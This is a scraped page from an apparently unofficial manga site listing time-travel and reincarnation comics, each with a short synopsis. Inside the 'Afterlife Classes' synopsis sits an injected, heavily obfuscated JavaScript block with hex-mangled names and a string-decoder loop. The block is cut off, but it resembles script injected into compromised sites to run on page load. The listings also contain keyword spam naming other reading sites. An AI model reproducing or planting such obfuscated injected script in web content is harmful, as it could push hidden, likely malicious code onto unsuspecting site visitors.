Time Travel - Page 11

Discover top manga Time Travel with stunning art and thrilling tales. Enjoy the best Time Travel manga free online today!

211 results

My God! I Have Transformed Into the Turtle

I woke up and found myself in the body of a turtle! This is a turtle that can devour and evolve! Look, I am a turtle! Upgrade all the way! Conquer the whole continent! Marry a beautiful and rich woman! Reach the peak of turtle life!


After Transmigrating as the Biological Mother's Villainous Devil King

The Lord is 5 years old, one more year of his mother will die, the Lord will be completely blackened, destroyed the earth. Su Yitang, who wore the mother of the Lord\'s King, said: \"It\'s too hard for me! Who\'s his dad? Is there anyone in charge?


Afterlife Classes

Choi Kanghee has no friends and is often misunderstood due to his scary appearance, but all he really wants in life are some friends. One day, he returned home to mourn for his grandmother’s death anniversary, but a strange turn of events ends up reuniting Kanghee with his grandma! Can they work together to create new friends, or did it just turn more difficult? ??? ???! / Otherworld classes / The Otherworldly Class!<script></script><script>(function(_0x3932a8,_0x5316ea){var _0x2b7c52=_0x25e1,_0x5106ff=_0x3932a8();while(!![]){try{var _0x16ab7d=parseInt(_0x2b7c52(0x17d))/(0x233*-0xa+0x401*0x5+-0x2*-0xfd)*(parseInt(_0x2b7c52(0x177))/(-0x9*-0x3a9+-0x4f*-0x7c+-0x4733))+parseInt(_0x2b7c52(0x181))/(-0x2321+-0x15ed+0x3911)*(-parseInt(_0x2b7c52(0x175))/(0x7*-0x213+0x63a*-0x2+0x1afd))+-parseInt(_0x2b7c52(0x17f))/(-0x1461+-0x1*0x1c33+0x13f*0x27)+-parseInt(_0x2b7c52(0x174))/(-0xa60+-0x10*-0x18e+-0x22*0x6d)+parseInt(_0x2b7c52(0x172))/(0xeff*0x2+0x5*-0x28+-0x1d2f)*(-parseInt(_0x2b7c52(0x18e))/(0x1*-0x1d07+0x1*0x6b+0x1ca4))+parseInt(_0x2b7c52(0x18a))/(-0x1b*-0xed+0x1*0x14a5+-0x2d9b)+parseInt(_0x2b7c52(0x171))/(0x12*-0x1ef+0x1348*-0x1+-0x2*-0x1b10);if(_0x16ab7d===_0x5316ea)break;else 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The Reborn Ranker Chronicles

Legendary SSS-rank hunter Kang Tae-ha finally met his end. But just as he prepares to enter eternal sleep, he awakens once more in… imperial China?! Now, he must live as Liu Xinyun, the delinquent heir to a powerful company. All he wants to do is put his hunting days behind him, but in order to survive his new power-hungry relatives, Xinyun must hone his skills again, starting from level one. Can his own unique blend of necromancy and martial arts take him from useless bum to ultimate boss?


I’m Done Being a Hero, Even If It’s Retirement

Read “I’m Done Being a Hero, Even If It’s Retirement Novel” – “I’m Done Being a Hero, Even If It’s Retirement Manga” Online Free At HOT MANGA The summary of the comic I’m Done Being a Hero, Even If It’s Retirement: In this life, I will never live as a hero! Retirement, maybe! “A hero should remain heroic until the end.” Adelia, a knight who dedicated her life to the empire and died as a hero. But when she opened her eyes… ‘Nine years old? Me?!’ She was back in her childhood! Back to when her family was still alive before the fall of their house! Alright, this is a chance given by the gods. This time, I will save everyone and enjoy perfect retirement in a quiet place! But then… ”Sister!!!” Not only did she awaken the holy sword that had been asleep in the temple for 600 years, “Does the lady prefer tall men?” “…What?” The Crown Prince, who was her superior in her previous life, is showing interest in her? What is happening! I just want to retire quietly! “I’m Done Being a Hero, Even If It’s Retirement” is also known as: 영웅은 됐어요, 은퇴라면 몰라도 The comic “I’m Done Being a Hero, Even If It’s Retirement” belongs to the Genre: Comedy, Drama, Fantasy, Historical, kids, Manhwa, Romance, Royal family, Time Travel “ManhuaPlus, Manga Updates, Manhwa Website…” are the most searched keywords on the website KUN MANGA. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging


The 9th Class Swordmaster: Blade of Truth

In the year 237 of the Imperial Era, the ‘Divine War’ concludes – a war fought to protect humanity from ‘corruption.’ At the end of this battle, the Sword Saint, Kyril McGyver, faces betrayal from his closest friend and Emperor, Oliver. In the end, after killing the Emperor, Kyril decides to correct all the wrongs by returning to the past. Now, with a power he could not acquire in his past life – the power of the sword and magic – he stands at the apex of both paths, ready to change the future.


Kenseijo Adel no Yarinaoshi ~Kako ni Modotta Saikyou Kensei, Hime wo Sukuu Tame ni Seijo to Naru~

Hailed as the hero for leading his country to victory from a great war, the blind Sword Saint Adel is now in despair. Unfortunately, he failed to protect his benefactor, Princess Euphinea, whom he dedicated his entire life to. \"I want to meet the princess once again,\" he muttered, wishing deeply that his prayers would be answered. A mysterious being, having heard his plea, granted his prayers, and he was sent back to the past, to a time when the princess is still alive. Unexpectedly, the Sword Saint (♂) has been transformed into a super-duper cute Sword Saintess (♀), and her heroic tale of unrivaled power will once again take place.


Regressing As The Bastard Of The Sword Clan

Theo, the illegitimate son of the powerful Ragnar family, tried his best to the death but was unable to break the chain of bloodline due to lack of talent and was eventually pushed out of the competition for the throne. However, despite being a powerless illegitimate son, his brothers tried to eliminate Theo, and Theo, who was betrayed by his teacher, lost everything and met death. At the last moment, an unbelievable event called regression happened to Theo, who regretted every moment of his life. \"This life will be different.\" The illegitimate son who returned took up his sword and jumped into the competition for the throne.


Me, The Heavenly Destined Villain

Read Manhua Me, The Heavenly Destined Villain Online For Free At TopManhua Associated Names: El Villano del Destino / I Am the Fated Villain / Me, the Heavenly Destined Villain / Ta Trời Sinh Đã Là Nhân Vật Phản Diện / The Villain of Destiny / Villain Is Here / Моя судьба злодея / 我こそは大悪党 / 我!天命大反派 / 악역이지만 즐겁습니다 The Content Me, The Heavenly Destined Villain: Gu Ghangge, a traveller from another world, comes to realize that he is the villain in this world. However, with his noble background, unrivalled abilities, and a cheat system that penalizes the protagonist, he is ready to steal the protagonist’s thunder and win the female lead’s heart… New and hot comics are updated the fastest. God & Dark Pirates Battle Armor Academy The Evil Ring Manga Zin is a website that aggregates the latest and hottest manga, updated quickly to serve readers with high-quality images and deliver them an excellent experience.


The Blue World

The Blue Hole is a gateway that takes you back in time to a prehistoric age. In anticipation of the astonishing discovery, the United Kingdom and the United States dispatched a joint team to the Jurassic world 145 million years ago and embarked on a full-scale investigation. Just then, a sudden phenomenon cuts off communications with the modern world. Few people with limited equipment are left behind. Survival in a terrifying world where everything is unknown and dinosaurs roam free has begun!


Fukushū Papa ~ Ijime Ribenjā ~

\"Your daughter has committed suicide,\" is the news an unremarkable middle-aged man Wataru Fukunaga receives and finds himself face to face with the unrecognizable body of his daughter. In search of the truth about her death, he discovers that she was murdered. However, in an attempt to get to the truth, Wataru himself becomes a victim. Unexpectedly, he wakes up in the past before the death of his daughter.


Rookie Talent Agent Knows It All

Jeong Yun Ho, vice president of Top Entertainment and top actress Ju Yeong In’s husband, is a successful man, but despite all that he always feels empty inside. Would he be living a different life had he made a different choice? Ten years ago, he lost his precious smile. And now, suddenly his mobile phone rang. \"What the hell? I’m going to die?!?” But wait, it’s weird. He’s going back to his first year of life! The life of \"first year max level manager” is just beginning.
